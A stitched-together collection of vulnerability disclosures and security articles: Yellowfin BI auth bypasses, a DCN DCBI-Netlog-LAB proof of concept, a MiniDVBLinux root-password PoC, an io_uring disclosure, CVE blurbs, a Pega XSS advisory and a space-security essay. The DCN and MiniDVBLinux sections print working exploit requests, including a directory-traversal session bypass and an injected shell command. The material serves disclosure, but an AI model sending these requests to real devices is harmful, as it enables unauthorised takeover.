Pre- and post-auth path to pwnage

A trio of authentication bypass bugs stemming from the use of hardcoded keys have been patched in popular enterprise analytics platform Yellowfin BI.

After uncovering the pre-authentication vulnerabilities, security researchers from Assetnote then found a post-authentication path to command execution.

The flaws, which were discovered by Assetnote’s Max Garrett, have been assigned CVE numbers but not, as yet, CVSS scores.

**Bypasses**

The issues were discovered via instances of authentication logic as indicated by .

One authentication bypass (CVE-2022-47884) arose because contained “logic where allowed us to sign in as any user, as long as a signature check was passed”, according to a blog post published by Garrett and Assetnote CTO and co-founder Shubham Shah yesterday (January 24). The hardcoded private RSA key meant anyone could pass the signature check.

A second bypass, found in the JsAPI servlet, meant attackers could authenticate through the EXTAPI-IPID cookie, which was AES-encrypted using the hardcoded key’s user id (CVE-2022-47885).

“So it is possible for anyone who knows the victim’s user id to create a valid session as their account,” explained the blog post.

Read more of the latest enterprise security news

The third and final bypass (CVE-2022-47882) centered on Yellowfin’s suboptimal implementation of JWTs inside the REST API.

A valid refresh token id and extracted hardcoded key enabled the creation of a valid JWT as any user, although the impact was limited to privilege escalation given the need for a valid refresh token ID generated from a successful login.

Having performed an authentication bypass, a fourth bug – CVE-2022-47883 – then enabled attackers to perform remote code execution (RCE).

Noting Yellowfin BI’s connection to arbitrary data sources to pull data into the application, the researchers investigated whether JNDI or JDBC injections might enable command execution – and the JNDI mechanism, by using the gadget, duly proved fruitful.

Assetnote has published the full proof-of-concept exploit chain on GitHub.

The vulnerabilities have been patched in Yellowfin BI 9.8.1.

**Monolith application advice**

“In our assessment of enterprise applications, we often find hardcoded keys that lead to significant security impact (for example, our bug in VMWare AirWatch),” Shah told The Daily Swig. “Many enterprise products can be difficult to obtain due to qualification and sales processes. However once the source code has been obtained, there are often many critical vulnerabilities that can be exploited readily and easily.”

Yellowfin is a Java monolith application, and Shah and Garrett offered methodological advice to other security researchers hunting in similar codebases: “Map out the pre-authentication attack surface in as much detail as possible,” they said.

“Understand all of the routes, both static and dynamic, and then determine which portion of these routes are actually accessible without any authentication.”

After mapping pre-authentication routes, “determine how user input is processed by these routes and understand which routes take in what user input”, they continued. This will uncover issues warranting further investigation “simply based off the names of the controllers or parameters”.

YOU MIGHT ALSO LIKE AWS patches bypass bug in CloudTrail API monitoring tool

Yellowfin tackles auth bypass bug trio that opened door to RCE

An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.

**Information**

**Vendor of the products:**    Digital China Networks

**Vendor's website:**

https://www.dcnglobal.com (Global)

https://www.dcnetworks.com.cn (China)

**Reported by:**    WangJincheng(wjcwinmt@outlook.com)

**Affected products:** DCN (Digital China Networks) DCBI-Netlog-LAB

**Affected system version:** V1.0

**Product page:** https://www.dcnetworks.com.cn/goods/58.html

**Overview**

DCN (Digital China Networks) DCBI-Netlog-LAB is an online behavior log system. DCN (Digital China Networks) DCBI-Netlog-LAB V1.0 was detected with authentication bypass vulnerability and command injection vulnerability. An unauthenticated attacker can send crafted requests to bypass authentication through directory traversal, and inject arbitrary malicious commands into seven fields proto, ip, pport, p_dip, pdport, odev, and tport. Successful exploits could allow the attacker to execute arbitrary commands in remote systems.

**Vulnerability details**

The vulnerability was detected in the **/usr/local/lyx/lyxcenter/web/cgi-bin/network_config/nsg_masq.cgi** binary.

**Authentication bypass vulnerability**

In the sub_805534E function, user authentication is performed.

In the sub_8059C00 function, the __xstat function is used to check whether the /tmp/admincache/{user_name}/{session_id} path exists. If it does, the authentication check is passed.

The following figure shows the session value when the user name is admin.

Therefore, we can set user_name to admin and write ../ in session_id, points to the upper-layer directory, causing **directory traversal**. In this way, we can bypass this authentication, gain administrator privileges, and continue to exploit the following command injection vulnerability.

**Command injection vulnerability**

When the act field is 2 or 3, the sub_8049D50 function is called.

In the sub_8049D50 function, the contents of the proto, ip, pport, p_dip, pdport, odev, and tport fields are concatenated into the command string without any filtering.

Finally, whether the act field is 2 (that is, a1 is 1) or 3 (that is, a1 is 0), the popen function is called with the command string executed as an argument.

To sum up, an unauthenticated attacker can bypass authentication through directory traversal, and then make act 2 or 3, and inject arbitrary malicious commands into seven fields such as proto, thus gaining control of the remote systems.

**Poc**

For example, send the following message by the GET request.

    GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/hack_result.html; HTTP/1.1
    Host: 192.168.5.254
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    

The above request message is just a demonstration. In addition, you can set act to 2 or 3 and inject arbitrary malicious commands into seven fields proto, ip, pport, p_dip, pdport, odev, and tport.

**Attack Demo**

Before the attack, no /hack_result.html page exists.

Follow the POC above to make the request.

After the attack, visit /hack_result.html again, you can see hack_result.html has been successfully created, and written to the results of the ls command to explain that the command ls>/usr/local/lyx/lyxcenter/web/hack_result.html we injected has been executed successfully.

CVE-2023-26802: my-vuls/DCN DCBI-Netlog-LAB at main · winmt/my-vuls

MiniDVBLinux versions 5.4 and below root password changing proof of concept exploit.

    MiniDVBLinux 5.4 Change Root Password PoCVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows a remote attacker to change the rootpassword of the system without authentication (disabled by default)and verification of previously assigned credential. Command executionalso possible using several POST parameters.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5715Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php24.09.2022--Default root password: mld500Change system password:-----------------------POST /?site=setup&section=System HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6Cache-Control: max-age=0Connection: keep-aliveContent-Length: 778Content-Type: application/x-www-form-urlencodedCookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfbaHost: ip:8008Origin: http://ip:8008Referer: http://ip:8008/?site=setup&section=SystemUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-gpc: 1APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+Pretty post data:APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: r00tBUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/KumanovoKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: SYSTEM_PASSWORD Eenable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1WEBIF_PASSWORD_CHECK: 1action: saveparams: changed: WEBIF_PASSWORD_CHECK Disable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: WEBIF_PASSWORD_CHECK

MiniDVBLinux 5.4 Change Root Password

In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 22 Apr 2022 02:43:27 +0200
From: David Bouman <dbouman03@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux: UaF due to concurrency issue in io\_uring timeouts

Hello list,

We (Jayden Rivers and David Bouman) are disclosing a bug we found in the 
Linux kernel's io\_uring subsystem. We have written a local privilege 
escalation PoC that can successfully elevate to system root from an 
unprivileged process (in a container). We will be releasing a blog post 
(including exploit code) in a week or two. It should be noted that 
unlike many Linux vulnerabilities that have surfaced recently, 
triggering this one does not require an attacker to have any kind of 
privileges (e.g. in a user namespace). This leaves many systems vulnerable.

We are still looking for a CNA representative that can assign a CVE 
number for this vulnerability; please contact us!

Kernel versions 5.10+ are affected, and linux-stable patches are already 
pushed. The upstream patch commit is 
e677edbcabee849bfdd43f1602bccbecf736a646 ("io\_uring: fix race between 
timeout flush and removal").

When the IORING\_OP\_TIMEOUT (T) and IORING\_OP\_LINK\_TIMEOUT (LT) opcodes 
are combined in a linked submission queue entry, and another request (B) 
finishes, a race might occur: namely, when due to the completion of B, T 
is cancelled (through the completion event count), and LT is canceled by 
its hrtimer at the same time. Whilst T is still being cleaned up, LT is 
already freed by a different execution context, and since they are 
linked, the cleanup of T retains a dangling reference to the now-freed 
LT. Hence, there's a use-after-free.

Exploitation-wise, the attacker can reallocate LT to another \`struct 
io\_kiocb\` and defer the UaF to e.g. a \`struct file\` (this is the 
technique we will describe in aforementioned blog post).

The race window is quite tight and the scenario is complicated, so the 
race can only be won very infrequently in our experience.

It is advised to upgrade your kernel to latest ASAP.

Greetings,

Jayden Rivers & David Bouman

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-29582: security - Linux: UaF due to concurrency issue in io_uring timeouts

The uListing plugin for WordPress is vulnerable to authorization bypass via wp_route due to missing capability checks, and a missing security nonce, in the StmListingSingleLayout::import_new_layout method in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to change any WordPress option in the database.

CVE-2021-4381: Changeset 2456786 for ulisting – WordPress Plugin Repository

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

CVE-2022-24302: Changelog — Paramiko documentation

FilePath#toURI, FilePath#hasSymlink, FilePath#absolutize, FilePath#isDescendant, and FilePath#get*DiskSpace do not check any permissions in Jenkins 2.318 and earlier, LTS 2.303.2 and earlier.

CVE-2021-21694: Jenkins Security Advisory 2021-11-04

CheckMK Raw Edition software (versions 1.5.0 to 1.6.0) does not sanitise the input of a web service parameter that is in an unauthenticated zone. This Reflected XSS allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts) or to steal the session cookies of a user who has previously authenticated via a man in the middle. Successful exploitation requires access to the web service resource without authentication.

**checkmk  
Everything monitored**

Quickly gain a complete view of your IT infrastructure, no matter how complex.

Checkmk provides powerful monitoring of networks, servers, clouds, containers and applications. Fast. Effective.

**Monitor your entire hybrid IT infrastructure**

We maintain an incomparable collection of 1,800+ plug-ins.  
See them all

**Resolve issues faster**

**Dynamic dashboards**

Flexible, real-time dashboards

**Powerful visualizations**

Interactive and dynamic visualization options

**Infrastructure monitoring**

Hosts and Services overviews that enable fast drill downs

**Log and event monitoring**

Efficient processing and analysis of logs

**Availability and SLA reporting**

Precise availability and SLA fulfillment reporting

**Notifications and alerts**

Advanced notification system with many integrations

**Simple, flexible configuration**

Modern, efficient and automatic configuration system

*   News
    
    **Introducing Checkmk 2.0**
    
    Checkmk 2.0 brings a completely new, intuitive user interface with simpler workflows, powerful features for network flow monitoring, and many new and updated features.
    
    Learn more about Checkmk 2.0
    
    ![slide](http://checkmk.com/application/files/4616/1530/1347/homepage_cmk2.png)
    
*   Checkmk Conference #8
    
    **Tickets Still Available**
    
    The Checkmk Conference #8 is now bookable! Be fast and save your preferred workshop seat and conference ticket for 2022. Benefit from insightful talks and an on-site community experience back in Munich.
    
    Yes, I want to attend!
    
    ![slide](http://checkmk.com/application/files/8516/3915/5056/logocomplex_green_transparent.png)
    

![Flexibility](https://checkmk.com/application/files/2016/0310/8046/icon_flexible.svg)

**Rapid deployment**

From 0 to monitoring in <10 min

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Fast installation from a single package, available for many platforms

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Identification of more than 90% of devices and services via auto-discovery

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Intelligent alarms with pre-set thresholds based on industry expertise

![Scalability](https://checkmk.com/application/files/7916/0310/8049/icon_scale.svg)

**Unlimited scale**

Hundreds of thousands of hosts

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Highly efficient instances can monitor hundreds of thousands of services

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Distributed architecture supports hundreds of instances

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Minimal hardware requirements on server- and client-side

![Configuration](https://checkmk.com/application/files/8916/0310/8052/icon_setup.svg)

**Powerful automation**

Checkmk does the work for you

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Auto-discovery, auto-configuration and automated agent updates

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Automated monitoring for dynamic, ephemeral infrastructures

![Check](https://checkmk.com/application/files/4216/0274/4196/icon_check.svg)

Powerful API enables integrations with other ITOM/ITSM systems

![Checkmk Guide](http://checkmk.com/application/files/1316/0274/5193/illustration_bottom.jpg "Checkmk Guide")

**Our philosophy**

With Checkmk, monitoring is just the beginning.

Our community actively shares monitoring knowledge and best practices from a diverse set of industries. We combine that expertise with our creativity to build the ideal solution for monitoring IT environments of all kinds.

We believe in a best-of-breed approach — you should always choose the right tool for your needs. That's why we build strong integrations that allow you to use Checkmk to monitor everything that powers your business.

Checkmk is the best way to monitor your complex and hybrid IT infrastructure.

CVE-2021-40906: Infrastructure & Application Monitoring with Checkmk

As more and more infrastructure is deployed in space, the risk of cyber attacks increases. The US military wants to team up with the private sector to protect assets everyone relies on.

_THIS ARTICLE IS republished from The Conversation under a_ _Creative Commons license._

The US military recently launched a groundbreaking initiative to strengthen ties with the commercial space industry. The aim is to integrate commercial equipment into military space operations, including satellites and other hardware. This would enhance cybersecurity for military satellites.

As space becomes more important to the world’s critical infrastructure, the risk increases that hostile nation-states will deploy cyberattacks on important satellites and other space infrastructure. Targets would include not just spy satellites or military communications satellites, but commercial spacecraft too.

The US Department of Defense believes its new partnership, called Commercial Augmentation Space Reserve (CASR), would enhance US national security and the country’s competitive advantage in space. It would go some way beyond the relationship between government and private contractor that already exists.

In some cases, the commercial sector has advanced rapidly beyond government capabilities. This situation exists in numerous countries with a space capability and may apply in certain areas in the US too.

The governments of some nation-states are therefore confronted with a choice. They could utilize bespoke systems for protecting their satellites, even though these may be outdated, or they could use other commercial—and potentially more advanced—“off-the-shelf” components. However, the commercial hardware may be less well understood in terms of its vulnerabilities to cyberattacks.

Nevertheless, the US military believes that CASR will give it advanced strategic capabilities, and that potential risks can be minimized by actively avoiding overreliance on any single commercial entity.

The supply chain aims to transition the US military from a restricted pool of commercial suppliers to a broader spectrum of partners. However, there are risks with a bigger pool of commercial suppliers too. Some might be unable to meet the demands of military contracts, could run into financial instability, or encounter other pressures that hinder their ability to supply critical components.

**New Priorities**

In 2022 there was a cyberattack on the KA-Sat consumer satellite broadband service. It targeted the satellites delivering the broadband and disrupted the service.

There are many ways to attack another state’s satellites, such as anti-satellite (ASAT) weapons, which are often designed to physically destroy or disable the spacecraft. However, compared to ASATs, cyberattacks can be carried out in ways that are cheaper, quicker, and more difficult to trace.

Part of the critical need to prioritize cybersecurity as a result of this strategy is that the US is an attractive market for global players in space. This strategic shift by the US Department of Defense is therefore likely to encourage more global companies to participate.

Resilience to cyberattacks in the space industry has not always been a top priority. It is likely to take time for this to enter the thinking of major players in the space sector.

This historical lack of emphasis on cybersecurity in space highlights an obvious need. There are also inconsistencies and gaps regarding the basic cyber requirements for government and industry, which vary depending on the stance of each nation-state.

The US military claims that interoperability in military standards—the ability of different hardware to work seamlessly together—will strengthen the new public-private relationship. It has also left the door open for commercial standards to be adopted in certain instances. But there’s a risk that shifting from military standards (which are typically more stringent than commercial standards) could undermine military assets and lead to the same adverse consequences the strategy seeks to avoid.

Despite the best intentions, the complexities of working with many more and newer commercial partners could also lead to inconsistencies in the application of standards across different projects and systems. Commercial cybersecurity standards are unlikely to prioritize the same level of security required for military applications, especially under extreme conditions.

In light of these challenges, the success of these initiatives hinges on having leaders who are proactive and well informed. Being able to act across the commercial and defense sectors will require key skills—one of which is being informed and educated on cybersecurity.

Recently, I developed an executive space cybersecurity course with postgraduate credentials in partnership with the International Space University. This executive-level course attracted professionals from various sectors, including the legal profession, regulators, consultants, commercial businesses, and investors.

By bridging the gap between different sectors and disciplines, the course fostered an all-round, multidisciplinary approach to space cybersecurity. Executives were able to gain a deeper understanding of the interconnectedness of various systems and the potential vulnerabilities that can arise. This not only enriched the learning experience but also encouraged participants to think outside the box and explore new strategies for mitigating cyber threats in space.

As the Pentagon and the commercial space industry forge ahead with their groundbreaking collaboration, it is important that those making decisions understand the critical nature of cybersecurity. This shift is not without its challenges. But it also presents opportunities for innovation and new partnerships which could shape the future of space exploration and lead to new approaches to cybersecurity for satellites and other space infrastructure.

The US Wants to Integrate the Commercial Space Industry With Its Military to Prevent Cyber Attacks


Pega Platform versions 8.1 to 8.8.2 are affected by an XSS issue with Pin description







Pega continually works to implement security controls designed to protect client environments. With this focus, Pega was notified of 3 security vulnerabilities that are rated **Medium** on the CVSS scale.  We would like to thank Reuben Seymour, Amber Hamlet and Skyler Knecht for finding these vulnerabilities. 

**Issue** 

**Description** 

**Impact** 

E23 

Cross Site Script (XSS) vulnerability 

Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.    

Clients with internet-facing applications should update or apply the hotfix.  Clients running their own infrastructure should consult their security teams. 

This affects normal authenticated users. 

We are not aware of any of our clients being compromised as a result of this vulnerability. 

The remediation for this issue will be included as part of the product in the 8.7.6, 8.8.4 patch release and the Infinity 23.1.1 release of the Pega Platform.  Hotfixes are being created only for the latest patch releases in standard support (8.7.5 & 8.8.3, and Infinity 23.1.0).  We will not provide hotfixes on prior versions of the platform, nor will we provide steps as part of a local change. 

If you are a **Pega Cloud ®** client or a United States **Pega Cloud for Government (PCFG)** client, details are listed in your Client Advisory (CAD case) on next actions.  

If you are an **on–premises** or **client managed cloud** client, please review the tables below to determine which hotfixes correspond to your Pegasystems installation. Once you have determined the appropriate hotfix IDs, please submit hotfix requests using My Support Portal.  As always, be sure you have appropriate backups in place _before_ applying the hotfixes.  

As always, we recommend our clients review our Security Checklist regularly.  

Please refer to your Client Advisory, \[CAD-\] case that was provided to your security and administrator contacts on Sept 21, 2023, in My Support Portal.  

 CVE Details 

**CVE Details** 

**Issue:** 

**XSS issue with task creation** 

**Issue:** 

**XSS issue with ad-hoc case creation** 

**Issue:** 

**XSS issue with Pin description** 

**Software/Product** 

Pega Platform 

Pega Platform 

Pega Platform 

**Affected Version(s)** 

From 8.1 to Infinity 23.1.0 

From 8.1 to  Infinity 23.1.0 

From 8.1 to  8.8.2 

**CVE ID** 

CVE-2023-32087 

CVE-2023-32088 

CVE-2023-32089 

**CVSS Rating** 

4.6 

4.6 

4.6 

**Description** 

Cross Site Script (XSS) vulnerability 

Cross Site Script (XSS) vulnerability 

Cross Site Script (XSS) vulnerability 

**Hotfix Details** 

Hotfixes have been created only for the latest patch releases in standard support (8.7.5 & 8.8.3, and Infinity 23.1.0).  We will not provide hotfixes on prior versions of the platform, nor will we provide steps as part of a local change.   

As a best practice, you should update your Pega environment to the latest release to take advantage of the latest features, capabilities, security and bug fixes.  See Keeping current with Pega. 

**Version** 

**XSS issue with task creation** 

**XSS issue with ad-hoc case creation** 

**XSS issue with Pin description** 

8.7.5 

HFIX-A666 

HFIX-A666 

HFIX-A667 

8.8.3 

HFIX-A665 

HFIX-A665 

Fixed in release 

Inf 23.1.0 

HFIX-A781 

HFIX-A781 

Fixed in release 

The fixes for these issues are contained in the upcoming patch releases:  The 8.7.6 patch release was made available on Sept 29. 2023.  The 8.8.4 patch release is targeted for the end of Oct. 2023.  The Infinity 23.1.0 release was made available on Sept. 13, 2023. The Infinity 23.1.1 release is targeted for Nov. 2023.  https://support.pega.com/pega-infinity-patch-calendar 

In addition, please review the following article regarding preventing risk of XSS attack when specifying Label controls: https://support.pega.com/support-doc/preventing-risk-xss-attack-when-specifying-label-controls-sdr-a71

Search

lenovo warranty check/lookup | check warranty status | lenovo support us